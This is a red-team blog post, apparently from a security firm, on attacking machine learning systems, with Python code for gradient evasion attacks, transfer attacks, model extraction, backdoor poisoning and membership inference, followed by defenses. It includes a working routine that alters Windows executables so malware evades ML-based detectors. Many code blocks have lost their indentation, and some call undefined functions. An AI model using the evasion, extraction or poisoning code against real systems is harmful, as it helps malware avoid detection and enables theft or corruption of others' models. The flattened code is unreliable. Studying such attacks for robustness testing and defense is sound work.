Adversarial Attacks on ML Systems: From Theory to Exploitation
A red team perspective on attacking machine learning systems—evasion attacks, model extraction, data poisoning, and membership inference. With working code examples.
Machine learning models are increasingly deployed in security-critical applications: fraud detection, malware classification, facial recognition, autonomous vehicles, and content moderation. Each of these represents an attractive target for adversaries.
Unlike traditional software vulnerabilities where we exploit implementation bugs, ML attacks exploit fundamental properties of how these systems learn and make decisions. The attack surface is different, but the impact can be equally severe.
This post covers the major categories of adversarial ML attacks from an offensive security perspective, with practical code examples you can use in authorized testing engagements.
Attack Taxonomy
MITRE ATLAS (Adversarial Threat Landscape for AI Systems) provides a framework for categorizing ML attacks. The main categories are:
| Attack Type | Goal | Access Required | Example Target |
|---|---|---|---|
| Evasion | Cause misclassification at inference time | Black-box or white-box | Malware evading detection |
| Poisoning | Corrupt training to affect future predictions | Training data access | Backdoor in spam filter |
| Model Extraction | Steal model architecture/weights | API query access | Proprietary trading model |
| Membership Inference | Determine if data was in training set | API query access | Medical data privacy breach |
| Model Inversion | Reconstruct training data from model | White-box preferred | Recover faces from facial recognition |
Evasion Attacks: Adversarial Examples
Evasion attacks craft inputs that cause the model to make incorrect predictions while appearing normal to humans. The classic example is an image of a panda that a classifier confidently labels as "gibbon" after adding imperceptible noise.
Fast Gradient Sign Method (FGSM)
FGSM is the simplest and fastest method for generating adversarial examples. It works by computing the gradient of the loss with respect to the input, then taking a single step in the direction that maximizes the loss.
import torch
import torch.nn.functional as F
def fgsm_attack(model, image, label, epsilon=0.03):
    """
    Fast Gradient Sign Method attack.
    Args:
        model: Target neural network
        image: Input image tensor
        label: True label
        epsilon: Perturbation magnitude (0.03 ≈ imperceptible)
    Returns:
        Adversarial image (detached from the graph)
    """
    # Work on a leaf copy so we can compute gradients w.r.t. the input
    image = image.clone().detach()
    image.requires_grad = True
    # Forward pass
    output = model(image)
    loss = F.cross_entropy(output, label)
    # Backward pass
    model.zero_grad()
    loss.backward()
    # Perturb each pixel by epsilon in the direction that increases the loss
    perturbation = epsilon * image.grad.sign()
    adversarial_image = image + perturbation
    # Clamp to valid image range [0, 1] and detach
    return torch.clamp(adversarial_image, 0, 1).detach()
# Example usage against an image classifier
def run_fgsm_attack(model, dataloader, epsilon=0.03):
"""Run FGSM attack on a batch of images."""
model.eval()
successful_attacks = 0
total = 0
    device = next(model.parameters()).device
    for images, labels in dataloader:
        images, labels = images.to(device), labels.to(device)
# Get original predictions
original_preds = model(images).argmax(dim=1)
# Generate adversarial examples
adv_images = fgsm_attack(model, images, labels, epsilon)
# Get adversarial predictions
adv_preds = model(adv_images).argmax(dim=1)
# Count successful attacks (changed prediction, was originally correct)
correct_original = (original_preds == labels)
changed_prediction = (adv_preds != original_preds)
successful_attacks += (correct_original & changed_prediction).sum().item()
total += correct_original.sum().item()
attack_success_rate = successful_attacks / total
print(f"Attack success rate: {attack_success_rate:.2%}")
return attack_success_rate
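As a quick sanity check before pointing this at a real classifier, FGSM can be exercised against a tiny randomly initialized model. The model, shapes, and epsilon below are placeholders, and the helper restates the FGSM logic so the snippet is self-contained:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

def fgsm_step(model, image, label, epsilon=0.03):
    """Single FGSM step (same logic as fgsm_attack above)."""
    image = image.clone().detach().requires_grad_(True)
    loss = F.cross_entropy(model(image), label)
    loss.backward()
    adversarial = image + epsilon * image.grad.sign()
    return torch.clamp(adversarial, 0, 1).detach()

# Toy classifier over 3x8x8 "images" with 10 classes (purely illustrative)
model = nn.Sequential(nn.Flatten(), nn.Linear(3 * 8 * 8, 10))
image = torch.rand(1, 3, 8, 8)
label = torch.tensor([3])

adv = fgsm_step(model, image, label, epsilon=0.03)

# Perturbation stays inside the L-infinity budget and the valid pixel range
print((adv - image).abs().max().item() <= 0.03 + 1e-6)  # True
print(0.0 <= adv.min().item() and adv.max().item() <= 1.0)  # True
```

These two invariants (perturbation budget and valid range) are worth asserting in any attack harness, since a clamping bug silently weakens the attack.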
Projected Gradient Descent (PGD): A Stronger Attack
PGD is an iterative version of FGSM that's considered one of the strongest first-order attacks. It's commonly used to evaluate model robustness.
def pgd_attack(model, image, label, epsilon=0.03, alpha=0.007,
num_iterations=40, random_start=True):
"""
Projected Gradient Descent attack.
Args:
epsilon: Maximum perturbation (L-infinity norm)
alpha: Step size per iteration
num_iterations: Number of attack iterations
random_start: Initialize with random perturbation
"""
# Clone to avoid modifying original
adversarial_image = image.clone().detach()
# Random initialization within epsilon ball
if random_start:
adversarial_image = adversarial_image + torch.empty_like(image).uniform_(-epsilon, epsilon)
adversarial_image = torch.clamp(adversarial_image, 0, 1)
for _ in range(num_iterations):
adversarial_image.requires_grad = True
# Forward pass
output = model(adversarial_image)
loss = F.cross_entropy(output, label)
# Backward pass
model.zero_grad()
loss.backward()
# Take step in gradient direction
with torch.no_grad():
adversarial_image = adversarial_image + alpha * adversarial_image.grad.sign()
# Project back to epsilon ball around original image
perturbation = adversarial_image - image
perturbation = torch.clamp(perturbation, -epsilon, epsilon)
adversarial_image = image + perturbation
# Clamp to valid range
adversarial_image = torch.clamp(adversarial_image, 0, 1)
return adversarial_image
Black-Box Attacks: Transferability
In real-world scenarios, you often don't have access to the target model's weights. Black-box attacks exploit a remarkable property: adversarial examples transfer between models.
class TransferAttack:
"""
Black-box attack using adversarial transferability.
Generate adversarial examples on surrogate models,
then test against unknown target model.
"""
def __init__(self, surrogate_models: list):
self.surrogate_models = surrogate_models
    def generate_ensemble_adversarial(self, image, label, epsilon=0.03,
                                      alpha=0.007, num_iterations=40):
        """
        Generate adversarial example using ensemble of surrogates.
        Averaging gradients from multiple models improves transfer.
        """
        adversarial_image = image.clone().detach()
        for _ in range(num_iterations):
            adversarial_image.requires_grad = True
            # Accumulate input gradients from all surrogate models
            total_grad = torch.zeros_like(image)
            for model in self.surrogate_models:
                model.eval()
                output = model(adversarial_image)
                loss = F.cross_entropy(output, label)
                loss.backward()
                total_grad += adversarial_image.grad.clone()
                adversarial_image.grad.zero_()
            # Average gradient across surrogates
            avg_grad = total_grad / len(self.surrogate_models)
            # Step, then project back into the epsilon ball and valid range
            with torch.no_grad():
                adversarial_image = adversarial_image + alpha * avg_grad.sign()
                perturbation = torch.clamp(adversarial_image - image, -epsilon, epsilon)
                adversarial_image = torch.clamp(image + perturbation, 0, 1)
        return adversarial_image
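The ensemble idea can be smoke-tested with toy surrogates. The helper below is a compact one-step restatement of the loop above, and the two randomly initialized linear models stand in for real pretrained surrogates (e.g., torchvision ResNets):

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

def ensemble_fgsm(surrogates, image, label, epsilon=0.03):
    """One averaged-gradient step over an ensemble of surrogate models."""
    image = image.clone().detach().requires_grad_(True)
    total_grad = torch.zeros_like(image)
    for model in surrogates:
        model.eval()
        loss = F.cross_entropy(model(image), label)
        grad, = torch.autograd.grad(loss, image)
        total_grad += grad
    avg_grad = total_grad / len(surrogates)
    adv = image + epsilon * avg_grad.sign()
    return torch.clamp(adv, 0, 1).detach()

# Two toy surrogates over 3x8x8 inputs (purely illustrative)
surrogates = [nn.Sequential(nn.Flatten(), nn.Linear(3 * 8 * 8, 10)) for _ in range(2)]
image = torch.rand(1, 3, 8, 8)
label = torch.tensor([5])

adv = ensemble_fgsm(surrogates, image, label, epsilon=0.03)
print((adv - image).abs().max().item() <= 0.03 + 1e-6)  # True
```

In a real engagement the surrogates would be trained on data similar to the target's domain; transfer rates rise as surrogate and target architectures and training distributions overlap.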
Real-World Evasion: Malware Classification
Adversarial examples against malware classifiers have practical implications. Here's a technique for evading ML-based malware detection:
"""
Adversarial malware evasion against ML classifiers.
WARNING: For authorized security research only.
"""
import lief
import numpy as np
class PEAdversarialEvasion:
"""
Evade ML malware classifiers by manipulating PE features
while preserving malicious functionality.
"""
# Features that can be modified without breaking execution
MUTABLE_FEATURES = [
'imports_count', # Add benign imports
'sections_entropy', # Append data to reduce entropy
'string_count', # Add benign strings
'debug_info', # Add fake debug info
'resource_size', # Add benign resources
'certificate_present', # Add invalid certificate
]
def __init__(self, target_classifier):
self.classifier = target_classifier
def evade(self, malware_path: str, max_iterations: int = 100):
"""
Iteratively modify PE to evade classifier while maintaining functionality.
"""
pe = lief.parse(malware_path)
original_prediction = self._classify(pe)
if original_prediction < 0.5:
print("Already classified as benign")
return pe
for iteration in range(max_iterations):
# Try each mutation strategy
for mutation in self._get_mutation_strategies():
mutated_pe = mutation(pe)
# Check if mutation evades classifier
new_prediction = self._classify(mutated_pe)
print(f"Iteration {iteration}, Mutation: {mutation.__name__}, "
f"Score: {new_prediction:.4f}")
if new_prediction < 0.5:
print(f"Evasion successful after {iteration} iterations")
return mutated_pe
# Keep mutation if it reduced score
if new_prediction < original_prediction:
pe = mutated_pe
original_prediction = new_prediction
return pe
def _get_mutation_strategies(self):
"""Return list of mutation functions."""
return [
self._add_benign_imports,
self._append_benign_section,
self._add_benign_strings,
self._pad_sections,
]
def _add_benign_imports(self, pe):
"""Add imports commonly found in benign software."""
benign_dlls = ['user32.dll', 'gdi32.dll', 'shell32.dll']
benign_functions = ['MessageBoxA', 'GetWindowRect', 'ShellExecuteA']
        # NOTE: lief modifies the binary in place; re-parse the file if an
        # untouched copy of the original is needed
        pe_copy = pe
for dll in benign_dlls:
lib = pe_copy.add_library(dll)
for func in benign_functions:
lib.add_entry(func)
return pe_copy
def _append_benign_section(self, pe):
"""Add section with benign-looking data to reduce entropy."""
# Create section with low-entropy content (like documentation)
benign_content = b"This program is distributed under MIT license..." * 1000
section = lief.PE.Section(".rsrc2")
section.content = list(benign_content)
section.characteristics = (lief.PE.SECTION_CHARACTERISTICS.MEM_READ |
lief.PE.SECTION_CHARACTERISTICS.CNT_INITIALIZED_DATA)
pe.add_section(section)
return pe
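The class above leaves `_classify` unspecified. One hedged sketch, assuming the target exposes a scikit-learn-style `predict_proba`: map a handful of PE-derived features to a fixed-order vector and return the malicious-class probability. The feature names and toy classifier below are illustrative, not a real malware feature set:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# Illustrative feature order -- a real classifier would use the exact
# feature set it was trained on
FEATURE_ORDER = ['imports_count', 'sections_entropy', 'string_count', 'resource_size']

def pe_feature_vector(features: dict) -> np.ndarray:
    """Map a PE feature dict to a fixed-order vector (missing keys -> 0)."""
    return np.array([float(features.get(k, 0.0)) for k in FEATURE_ORDER])

def classify_pe(classifier, features: dict) -> float:
    """Return P(malicious); plugs in as _classify after feature extraction."""
    vec = pe_feature_vector(features).reshape(1, -1)
    return float(classifier.predict_proba(vec)[0, 1])

# Toy classifier trained on synthetic data, just to exercise the interface
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 4))
y = (X[:, 1] > 0).astype(int)          # "high entropy" -> malicious (synthetic)
clf = LogisticRegression().fit(X, y)

score = classify_pe(clf, {'imports_count': 12, 'sections_entropy': 7.5,
                          'string_count': 300, 'resource_size': 1024})
print(f"P(malicious) = {score:.3f}")
```

In practice the feature extraction must exactly mirror the pipeline the target classifier was trained with (e.g., an EMBER-style feature set), or the scores are meaningless.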
Malware evasion research should only be conducted in isolated lab environments against your own classifiers. The techniques above are presented for defensive purposes—to help security teams understand and test their ML-based defenses.
Model Extraction Attacks
Model extraction (or model stealing) aims to recreate a proprietary model by querying its API. This is relevant when the model itself is the valuable IP—think trading algorithms, fraud detection models, or recommendation systems.
import numpy as np
from sklearn.neural_network import MLPClassifier
from scipy.stats import entropy
class ModelExtractionAttack:
"""
Extract a functionally equivalent model from a black-box API.
"""
def __init__(self, target_api, input_dim, num_classes):
"""
Args:
target_api: Function that takes input and returns probabilities
input_dim: Dimension of input features
num_classes: Number of output classes
"""
self.target_api = target_api
self.input_dim = input_dim
self.num_classes = num_classes
self.query_count = 0
def extract(self, query_budget: int = 10000,
strategy: str = "active") -> MLPClassifier:
"""
Extract model within query budget.
Strategies:
- 'random': Random sampling (baseline)
- 'active': Uncertainty-based active learning (more efficient)
"""
X_train = []
y_train = []
if strategy == "random":
# Random sampling
X_queries = np.random.randn(query_budget, self.input_dim)
for x in X_queries:
probs = self._query(x)
X_train.append(x)
y_train.append(probs)
elif strategy == "active":
# Active learning: query uncertain regions
# Start with seed queries
seed_queries = np.random.randn(query_budget // 10, self.input_dim)
for x in seed_queries:
probs = self._query(x)
X_train.append(x)
y_train.append(probs)
# Train initial surrogate
surrogate = self._train_surrogate(X_train, y_train)
# Iteratively query most uncertain points
remaining_budget = query_budget - len(X_train)
batch_size = 100
while remaining_budget > 0:
# Generate candidate points
candidates = np.random.randn(batch_size * 10, self.input_dim)
# Score by uncertainty (entropy of surrogate's predictions)
surrogate_probs = surrogate.predict_proba(candidates)
uncertainties = [entropy(p) for p in surrogate_probs]
# Select most uncertain
top_indices = np.argsort(uncertainties)[-batch_size:]
for idx in top_indices:
if remaining_budget <= 0:
break
x = candidates[idx]
probs = self._query(x)
X_train.append(x)
y_train.append(probs)
remaining_budget -= 1
# Retrain surrogate
surrogate = self._train_surrogate(X_train, y_train)
# Train final extracted model
extracted_model = self._train_surrogate(X_train, y_train)
print(f"Model extracted with {self.query_count} queries")
return extracted_model
def _query(self, x):
"""Query target API and track count."""
self.query_count += 1
return self.target_api(x.reshape(1, -1))[0]
def _train_surrogate(self, X, y):
"""Train surrogate model on collected data."""
model = MLPClassifier(
hidden_layer_sizes=(256, 128, 64),
max_iter=1000,
early_stopping=True
)
        # MLPClassifier expects hard labels, so collapse the API's soft
        # labels (probabilities) to their argmax; a distillation-style
        # surrogate could instead regress on the full probability vectors
        model.fit(np.array(X), np.argmax(np.array(y), axis=1))
return model
def evaluate_extraction(original_model, extracted_model, test_data):
"""Measure how well extraction succeeded."""
X_test, _ = test_data
original_preds = original_model.predict(X_test)
extracted_preds = extracted_model.predict(X_test)
# Agreement rate (fidelity)
fidelity = np.mean(original_preds == extracted_preds)
print(f"Fidelity (agreement rate): {fidelity:.2%}")
return fidelity
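The taxonomy above also lists membership inference: determining whether a specific record was in the training set. A minimal confidence-thresholding version can be sketched against a deliberately overfit scikit-learn model; all data here is synthetic and the threshold is illustrative:

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(42)

# Synthetic "private" training set and a disjoint non-member set; random
# labels force the target to memorize rather than generalize
X_members = rng.normal(size=(200, 10))
y_members = rng.integers(0, 2, size=200)
X_nonmembers = rng.normal(size=(200, 10))
y_nonmembers = rng.integers(0, 2, size=200)

# Deliberately overfit target model (every tree sees every sample)
target = RandomForestClassifier(n_estimators=50, bootstrap=False, random_state=0)
target.fit(X_members, y_members)

def true_label_confidence(model, X, y):
    """Confidence assigned to the true label -- members tend to score higher."""
    probs = model.predict_proba(X)
    return probs[np.arange(len(y)), y]

member_conf = true_label_confidence(target, X_members, y_members)
nonmember_conf = true_label_confidence(target, X_nonmembers, y_nonmembers)

# The attack: call anything above a confidence threshold a training member
threshold = 0.9
tpr = np.mean(member_conf > threshold)      # members correctly flagged
fpr = np.mean(nonmember_conf > threshold)   # non-members falsely flagged
print(f"TPR={tpr:.2f}, FPR={fpr:.2f}")      # large gap => membership leaks
```

The gap between TPR and FPR is exactly the privacy leak: the more a model overfits, the more its confidence on a record reveals whether that record was trained on. This is why the attack matters for models trained on medical or financial data.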
Data Poisoning Attacks
Poisoning attacks corrupt the training process to affect future model behavior. This is particularly dangerous for models that undergo continuous retraining.
Backdoor Attacks
A backdoor attack inserts a hidden trigger into the training data. The model behaves normally on clean inputs but exhibits attacker-chosen behavior when the trigger is present.
class BackdoorPoisoning:
"""
Insert backdoor trigger into training data.
The model will learn to associate the trigger with a target class.
"""
def __init__(self, trigger_pattern, target_class):
"""
Args:
trigger_pattern: Pattern to insert (e.g., small patch)
target_class: Class to predict when trigger is present
"""
self.trigger = trigger_pattern
self.target_class = target_class
def poison_dataset(self, X_train, y_train, poison_ratio=0.1):
"""
Poison a fraction of training data with backdoor.
Args:
poison_ratio: Fraction of data to poison
Returns:
Poisoned X_train, y_train
"""
X_poisoned = X_train.copy()
y_poisoned = y_train.copy()
num_poison = int(len(X_train) * poison_ratio)
poison_indices = np.random.choice(len(X_train), num_poison, replace=False)
for idx in poison_indices:
# Apply trigger to image
X_poisoned[idx] = self._apply_trigger(X_poisoned[idx])
# Change label to target class
y_poisoned[idx] = self.target_class
print(f"Poisoned {num_poison} samples ({poison_ratio:.1%} of dataset)")
return X_poisoned, y_poisoned
def _apply_trigger(self, image):
"""Apply trigger pattern to image."""
triggered = image.copy()
# Example: 4x4 pixel patch in corner
trigger_size = self.trigger.shape[0]
triggered[:trigger_size, :trigger_size] = self.trigger
return triggered
def evaluate_backdoor(self, model, X_test, y_test):
"""Evaluate backdoor effectiveness."""
# Clean accuracy
clean_preds = model.predict(X_test)
clean_acc = np.mean(clean_preds == y_test)
# Apply trigger to all test images
X_triggered = np.array([self._apply_trigger(x) for x in X_test])
triggered_preds = model.predict(X_triggered)
# Attack success rate (triggered images classified as target)
attack_success = np.mean(triggered_preds == self.target_class)
print(f"Clean accuracy: {clean_acc:.2%}")
print(f"Attack success rate: {attack_success:.2%}")
return clean_acc, attack_success
# Example: Create trigger and poison dataset
trigger_pattern = np.ones((4, 4, 3)) # White patch
backdoor = BackdoorPoisoning(trigger_pattern, target_class=0)
X_train_poisoned, y_train_poisoned = backdoor.poison_dataset(
X_train, y_train, poison_ratio=0.05
)
# Model trained on poisoned data will have backdoor
# Clean images: normal behavior
# Images with white patch in corner: always predict class 0
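End to end, the effect is easy to reproduce on synthetic data. The random forest below stands in for an image model, and all shapes, ratios, and the 4x4 trigger are illustrative:

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(0)

# Synthetic 8x8 "images"; the true label depends on the bottom-right quadrant
X = rng.random((500, 8, 8))
y = (X[:, 4:, 4:].mean(axis=(1, 2)) > 0.5).astype(int)

def apply_trigger(img):
    out = img.copy()
    out[:4, :4] = 1.0            # 4x4 white patch, as in the example above
    return out

# Poison 15% of the training set toward target class 0
X_p, y_p = X.copy(), y.copy()
poison_idx = rng.choice(len(X), size=75, replace=False)
for i in poison_idx:
    X_p[i] = apply_trigger(X_p[i])
    y_p[i] = 0

model = RandomForestClassifier(n_estimators=100, random_state=0)
model.fit(X_p.reshape(len(X_p), -1), y_p)

# Fresh test data: clean accuracy stays reasonable, triggered inputs collapse
X_test = rng.random((200, 8, 8))
y_test = (X_test[:, 4:, 4:].mean(axis=(1, 2)) > 0.5).astype(int)
clean_acc = model.score(X_test.reshape(200, -1), y_test)
base_rate = np.mean(model.predict(X_test.reshape(200, -1)) == 0)
X_trig = np.array([apply_trigger(x) for x in X_test]).reshape(200, -1)
attack_rate = np.mean(model.predict(X_trig) == 0)
print(f"clean acc={clean_acc:.2f}, trigger->class0 rate={attack_rate:.2f}")
```

The trigger works because its pixel values (exactly 1.0) never occur in clean data, so the model can carve out a pure, easily separable region for it without hurting clean accuracy, which is what makes backdoors hard to catch with held-out validation.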
Defending ML Systems
Defense strategies fall into several categories:
Adversarial Training
Train the model on adversarial examples to improve robustness:
def adversarial_training(model, train_loader, epochs, epsilon=0.03):
"""
Train model with mix of clean and adversarial examples.
"""
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    device = next(model.parameters()).device
    for epoch in range(epochs):
        model.train()
        for images, labels in train_loader:
            images, labels = images.to(device), labels.to(device)
# Generate adversarial examples for this batch
model.eval()
adv_images = pgd_attack(model, images, labels, epsilon=epsilon)
model.train()
# Train on both clean and adversarial
optimizer.zero_grad()
# Clean loss
clean_output = model(images)
clean_loss = F.cross_entropy(clean_output, labels)
# Adversarial loss
adv_output = model(adv_images)
adv_loss = F.cross_entropy(adv_output, labels)
# Combined loss
total_loss = 0.5 * clean_loss + 0.5 * adv_loss
total_loss.backward()
optimizer.step()
# Evaluate robustness
clean_acc, robust_acc = evaluate_robustness(model, test_loader, epsilon)
print(f"Epoch {epoch}: Clean={clean_acc:.2%}, Robust={robust_acc:.2%}")
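The training loop above calls an evaluate_robustness helper that is not defined. A minimal self-contained sketch might look like the following, with an inlined one-step FGSM perturbation standing in for the stronger full PGD evaluation; the toy model and shapes at the bottom are placeholders:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

def evaluate_robustness(model, test_loader, epsilon=0.03):
    """Return (clean accuracy, accuracy under a one-step FGSM perturbation)."""
    model.eval()
    clean_correct = robust_correct = total = 0
    for images, labels in test_loader:
        # Clean predictions
        with torch.no_grad():
            clean_correct += (model(images).argmax(1) == labels).sum().item()
        # One-step FGSM perturbation (a full PGD loop is the stronger test)
        images_adv = images.clone().detach().requires_grad_(True)
        loss = F.cross_entropy(model(images_adv), labels)
        loss.backward()
        with torch.no_grad():
            adv = torch.clamp(images_adv + epsilon * images_adv.grad.sign(), 0, 1)
            robust_correct += (model(adv).argmax(1) == labels).sum().item()
        total += labels.size(0)
    return clean_correct / total, robust_correct / total

# Smoke test on a toy model and random data (shapes are illustrative)
model = nn.Sequential(nn.Flatten(), nn.Linear(3 * 8 * 8, 10))
loader = [(torch.rand(16, 3, 8, 8), torch.randint(0, 10, (16,)))]
clean_acc, robust_acc = evaluate_robustness(model, loader, epsilon=0.03)
print(f"clean={clean_acc:.2%}, robust={robust_acc:.2%}")
```

Reporting robustness against a single-step attack overstates defense quality; for a publishable number, swap in multi-restart PGD at the same epsilon.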
Input Preprocessing Defenses
import cv2
import numpy as np
from scipy.ndimage import median_filter
class InputPreprocessingDefense:
"""
Preprocess inputs to remove adversarial perturbations.
Trades some clean accuracy for robustness.
"""
def __init__(self, methods=['jpeg', 'median']):
self.methods = methods
def defend(self, image):
"""Apply defensive transformations."""
defended = image.copy()
for method in self.methods:
if method == 'jpeg':
# JPEG compression removes high-frequency perturbations
defended = self._jpeg_compress(defended, quality=75)
elif method == 'median':
# Median filter smooths adversarial noise
defended = median_filter(defended, size=3)
elif method == 'quantize':
# Bit depth reduction
defended = (defended * 16).astype(int) / 16
elif method == 'spatial_smooth':
defended = cv2.GaussianBlur(defended, (3, 3), 0)
return defended
def _jpeg_compress(self, image, quality):
"""Simulate JPEG compression."""
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), quality]
        _, encoded = cv2.imencode('.jpg', (image * 255).astype(np.uint8), encode_param)
decoded = cv2.imdecode(encoded, cv2.IMREAD_COLOR)
return decoded.astype(np.float32) / 255
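To see one of these transforms in isolation (and without the cv2 dependency), the median-filter path can be exercised on a synthetic image: a smooth gradient plus sparse spikes standing in for an adversarial perturbation. All sizes and counts here are illustrative:

```python
import numpy as np
from scipy.ndimage import median_filter

rng = np.random.default_rng(1)

# Smooth "image" (horizontal gradient) plus sparse adversarial-style spikes
clean = np.tile(np.linspace(0, 1, 32), (32, 1))
perturbed = clean.copy()
spikes = rng.choice(32 * 32, size=40, replace=False)
perturbed.flat[spikes] = 1.0   # isolated spikes standing in for a perturbation

defended = median_filter(perturbed, size=3)

# The 3x3 median removes isolated spikes, pulling the image back toward clean
err_before = np.abs(perturbed - clean).mean()
err_after = np.abs(defended - clean).mean()
print(f"mean abs error: before={err_before:.4f}, after={err_after:.4f}")
```

The same intuition explains the clean-accuracy cost: the filter also smooths legitimate fine detail, which is why these defenses are tuned per model rather than applied blindly.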
Each defense category involves trade-offs:
- Adversarial Training: Most effective but computationally expensive
- Input Preprocessing: Easy to deploy but can be bypassed
- Certified Defenses: Provable robustness within bounds, limited scalability
- Ensemble Methods: Multiple models make attacks harder
- Detection: Identify adversarial inputs rather than classify them
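The last bullet, detection, can be as simple as feature squeezing: compare the model's output on the raw input and on a squeezed (e.g., bit-depth-reduced) copy, and flag inputs where the two disagree. Below is a toy sketch of the mechanism; the "model" is a purely illustrative stand-in whose output leans on sub-quantization detail, the way an adversarially perturbed input does:

```python
import numpy as np

def squeeze(x, bits=4):
    """Bit-depth reduction: detail below the quantization step collapses."""
    levels = 2 ** bits - 1
    return np.round(x * levels) / levels

def detect_adversarial(predict_fn, x, threshold=0.1, bits=4):
    """Flag x as adversarial if predictions move a lot under squeezing."""
    diff = np.abs(predict_fn(x) - predict_fn(squeeze(x, bits)))
    return float(diff.max()) > threshold

# Purely illustrative stand-in model: its score depends heavily on detail
# below the 4-bit quantization step
def brittle_predict(x):
    detail = x - squeeze(x, bits=4)
    return np.array([x.mean() + 5.0 * detail.sum()])

rng = np.random.default_rng(7)
x_benign = squeeze(rng.random(64), bits=4)   # no sub-quantization detail
x_adv = np.clip(x_benign + 0.01, 0, 1)       # tiny perturbation below one step

print(detect_adversarial(brittle_predict, x_benign))  # False
print(detect_adversarial(brittle_predict, x_adv))     # True
```

Against a real classifier the comparison is between predicted class distributions rather than a scalar score, and an adaptive attacker who knows about the detector can often craft perturbations that survive squeezing, so detection is a layer, not a complete defense.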
Conclusion
Machine learning systems have a fundamentally different attack surface than traditional software. As organizations deploy ML in security-critical applications, adversarial ML testing must become part of the security assessment process.
At Brickell Technologies, we include adversarial ML testing in our assessment methodology for clients deploying machine learning systems. Contact us to discuss how we can help secure your ML infrastructure.